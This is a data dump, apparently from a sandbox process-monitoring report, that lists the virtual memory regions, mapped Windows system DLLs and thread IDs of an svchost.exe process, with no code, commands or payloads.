Region:
id = 3004
start_va = 0x3a0000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003a0000"
filename = ""
Region:
id = 3005
start_va = 0x520000
end_va = 0x59ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000520000"
filename = ""
Region:
id = 3006
start_va = 0x5a0000
end_va = 0x65ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005a0000"
filename = ""
Region:
id = 3007
start_va = 0x6b0000
end_va = 0x72ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006b0000"
filename = ""
Region:
id = 3008
start_va = 0x7a0000
end_va = 0x81ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007a0000"
filename = ""
Region:
id = 3009
start_va = 0x860000
end_va = 0xb2efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 3010
start_va = 0xb30000
end_va = 0xcb7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b30000"
filename = ""
Region:
id = 3011
start_va = 0xcc0000
end_va = 0xe40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000cc0000"
filename = ""
Region:
id = 3012
start_va = 0xee0000
end_va = 0xfdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 3013
start_va = 0x1000000
end_va = 0x107ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001000000"
filename = ""
Region:
id = 3014
start_va = 0x10a0000
end_va = 0x111ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010a0000"
filename = ""
Region:
id = 3015
start_va = 0x1120000
end_va = 0x121ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001120000"
filename = ""
Region:
id = 3016
start_va = 0x1270000
end_va = 0x12effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001270000"
filename = ""
Region:
id = 3017
start_va = 0x1300000
end_va = 0x137ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001300000"
filename = ""
Region:
id = 3018
start_va = 0x13c0000
end_va = 0x143ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 3019
start_va = 0x1450000
end_va = 0x14cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001450000"
filename = ""
Region:
id = 3020
start_va = 0x1550000
end_va = 0x15cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001550000"
filename = ""
Region:
id = 3021
start_va = 0x15d0000
end_va = 0x164ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000015d0000"
filename = ""
Region:
id = 3022
start_va = 0x16d0000
end_va = 0x174ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000016d0000"
filename = ""
Region:
id = 3023
start_va = 0x17b0000
end_va = 0x182ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000017b0000"
filename = ""
Region:
id = 3024
start_va = 0x1860000
end_va = 0x18dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001860000"
filename = ""
Region:
id = 3025
start_va = 0x18e0000
end_va = 0x19dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000018e0000"
filename = ""
Region:
id = 3026
start_va = 0x77090000
end_va = 0x77189fff
monitored = 0
entry_point = 0x770aa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 3027
start_va = 0x77190000
end_va = 0x772aefff
monitored = 0
entry_point = 0x771a5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 3028
start_va = 0x772b0000
end_va = 0x77458fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 3029
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 3030
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 3031
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 3032
start_va = 0xff5b0000
end_va = 0xff5bafff
monitored = 0
entry_point = 0xff5b246c
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 3033
start_va = 0x7fef6b00000
end_va = 0x7fef6b20fff
monitored = 0
entry_point = 0x7fef6b103b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 3034
start_va = 0x7fef6b30000
end_va = 0x7fef6b42fff
monitored = 0
entry_point = 0x7fef6b31d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 3035
start_va = 0x7fef7570000
end_va = 0x7fef757dfff
monitored = 0
entry_point = 0x7fef7575500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 3036
start_va = 0x7fef7b50000
end_va = 0x7fef7b76fff
monitored = 0
entry_point = 0x7fef7b511a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 3037
start_va = 0x7fef7b80000
end_va = 0x7fef7c52fff
monitored = 0
entry_point = 0x7fef7bf8b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 3038
start_va = 0x7fef7cb0000
end_va = 0x7fef7ce1fff
monitored = 0
entry_point = 0x7fef7ccca90
region_type = mapped_file
name = "wmidcprv.dll"
filename = "\\Windows\\System32\\wbem\\WmiDcPrv.dll" (normalized: "c:\\windows\\system32\\wbem\\wmidcprv.dll")
Region:
id = 3039
start_va = 0x7fef7e30000
end_va = 0x7fef7ea6fff
monitored = 0
entry_point = 0x7fef7e6e7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 3040
start_va = 0x7fefb280000
end_va = 0x7fefb2acfff
monitored = 0
entry_point = 0x7fefb281010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 3041
start_va = 0x7fefb6b0000
end_va = 0x7fefb6c0fff
monitored = 0
entry_point = 0x7fefb6b1070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 3042
start_va = 0x7fefc4c0000
end_va = 0x7fefc540fff
monitored = 0
entry_point = 0x7fefc4ccec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 3043
start_va = 0x7fefc550000
end_va = 0x7fefc55cfff
monitored = 0
entry_point = 0x7fefc551348
region_type = mapped_file
name = "pcwum.dll"
filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")
Region:
id = 3044
start_va = 0x7fefc560000
end_va = 0x7fefc58bfff
monitored = 0
entry_point = 0x7fefc561860
region_type = mapped_file
name = "umpo.dll"
filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll")
Region:
id = 3045
start_va = 0x7fefc590000
end_va = 0x7fefc5aafff
monitored = 0
entry_point = 0x7fefc592068
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 3046
start_va = 0x7fefc5b0000
end_va = 0x7fefc5cdfff
monitored = 0
entry_point = 0x7fefc5b13b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 3047
start_va = 0x7fefc5d0000
end_va = 0x7fefc5e1fff
monitored = 0
entry_point = 0x7fefc5d1060
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 3048
start_va = 0x7fefc5f0000
end_va = 0x7fefc60efff
monitored = 0
entry_point = 0x7fefc5f5c68
region_type = mapped_file
name = "spinf.dll"
filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll")
Region:
id = 3049
start_va = 0x7fefc610000
end_va = 0x7fefc676fff
monitored = 0
entry_point = 0x7fefc61d320
region_type = mapped_file
name = "umpnpmgr.dll"
filename = "\\Windows\\System32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll")
Region:
id = 3050
start_va = 0x7fefc6c0000
end_va = 0x7fefc6c9fff
monitored = 0
entry_point = 0x7fefc6c3cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 3051
start_va = 0x7fefc7f0000
end_va = 0x7fefc836fff
monitored = 0
entry_point = 0x7fefc7f1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3052
start_va = 0x7fefcaf0000
end_va = 0x7fefcb07fff
monitored = 0
entry_point = 0x7fefcaf3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 3053
start_va = 0x7fefcc50000
end_va = 0x7fefcc71fff
monitored = 0
entry_point = 0x7fefcc55d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 3054
start_va = 0x7fefd0c0000
end_va = 0x7fefd0e4fff
monitored = 0
entry_point = 0x7fefd0c9658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 3055
start_va = 0x7fefd0f0000
end_va = 0x7fefd0fefff
monitored = 0
entry_point = 0x7fefd0f1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 3056
start_va = 0x7fefd1a0000
end_va = 0x7fefd1dcfff
monitored = 0
entry_point = 0x7fefd1a18f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 3057
start_va = 0x7fefd1e0000
end_va = 0x7fefd1f3fff
monitored = 0
entry_point = 0x7fefd1e10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 3058
start_va = 0x7fefd200000
end_va = 0x7fefd20efff
monitored = 0
entry_point = 0x7fefd2019b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 3059
start_va = 0x7fefd2a0000
end_va = 0x7fefd2aefff
monitored = 0
entry_point = 0x7fefd2a1020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 3060
start_va = 0x7fefd2b0000
end_va = 0x7fefd2c9fff
monitored = 0
entry_point = 0x7fefd2b1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 3061
start_va = 0x7fefd2d0000
end_va = 0x7fefd33bfff
monitored = 0
entry_point = 0x7fefd2d2780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 3062
start_va = 0x7fefd3e0000
end_va = 0x7fefd415fff
monitored = 0
entry_point = 0x7fefd3e1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 3063
start_va = 0x7fefd420000
end_va = 0x7fefd58cfff
monitored = 0
entry_point = 0x7fefd4210b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 3064
start_va = 0x7fefd590000
end_va = 0x7fefd5cafff
monitored = 0
entry_point = 0x7fefd591324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 3065
start_va = 0x7fefd5d0000
end_va = 0x7fefd7d2fff
monitored = 0
entry_point = 0x7fefd5f3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 3066
start_va = 0x7fefd860000
end_va = 0x7fefd8acfff
monitored = 0
entry_point = 0x7fefd861070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 3067
start_va = 0x7fefd8b0000
end_va = 0x7fefd94efff
monitored = 0
entry_point = 0x7fefd8b25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 3068
start_va = 0x7fefd950000
end_va = 0x7fefd9e8fff
monitored = 0
entry_point = 0x7fefd951c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 3069
start_va = 0x7fefd9f0000
end_va = 0x7fefdaf8fff
monitored = 0
entry_point = 0x7fefd9f1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 3070
start_va = 0x7fefdb00000
end_va = 0x7fefdcd6fff
monitored = 0
entry_point = 0x7fefdb01010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 3071
start_va = 0x7fefdce0000
end_va = 0x7fefdda8fff
monitored = 0
entry_point = 0x7fefdd5a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 3072
start_va = 0x7fefed60000
end_va = 0x7fefed6dfff
monitored = 0
entry_point = 0x7fefed61080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 3073
start_va = 0x7fefed70000
end_va = 0x7fefed77fff
monitored = 0
entry_point = 0x7fefed71504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 3074
start_va = 0x7feff130000
end_va = 0x7feff181fff
monitored = 0
entry_point = 0x7feff1310d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 3075
start_va = 0x7feff190000
end_va = 0x7feff1aefff
monitored = 0
entry_point = 0x7feff1960e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 3076
start_va = 0x7feff1b0000
end_va = 0x7feff1ddfff
monitored = 0
entry_point = 0x7feff1b1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3077
start_va = 0x7feff1e0000
end_va = 0x7feff246fff
monitored = 0
entry_point = 0x7feff1eb03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 3078
start_va = 0x7feff250000
end_va = 0x7feff37cfff
monitored = 0
entry_point = 0x7feff29ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 3079
start_va = 0x7feff380000
end_va = 0x7feff456fff
monitored = 0
entry_point = 0x7feff383274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 3080
start_va = 0x7feff460000
end_va = 0x7feff53afff
monitored = 0
entry_point = 0x7feff480760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 3081
start_va = 0x7feff5d0000
end_va = 0x7feff5d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 3082
start_va = 0x7fffff9a000
end_va = 0x7fffff9bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9a000"
filename = ""
Region:
id = 3083
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 3084
start_va = 0x7fffff9e000
end_va = 0x7fffff9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 3085
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 3086
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 3087
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 3088
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 3089
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 3090
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 3091
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 3092
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 3093
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 3094
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 3095
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 3096
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 3097
start_va = 0x7fffffdc000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 3098
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 3099
start_va = 0x1e0000
end_va = 0x1ebfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Thread:
id = 107
os_tid = 0x754
Thread:
id = 108
os_tid = 0x6b4
Thread:
id = 109
os_tid = 0x308
Thread:
id = 110
os_tid = 0x290
Thread:
id = 111
os_tid = 0x28c
Thread:
id = 112
os_tid = 0x288
Thread:
id = 113
os_tid = 0x264
Thread:
id = 114
os_tid = 0x260
Thread:
id = 115
os_tid = 0x25c
Thread:
id = 116
os_tid = 0x258
Thread:
id = 117
os_tid = 0x254
Thread:
id = 118
os_tid = 0x248
Thread:
id = 119
os_tid = 0x240
Thread:
id = 120
os_tid = 0x23c
Thread:
id = 121
os_tid = 0x238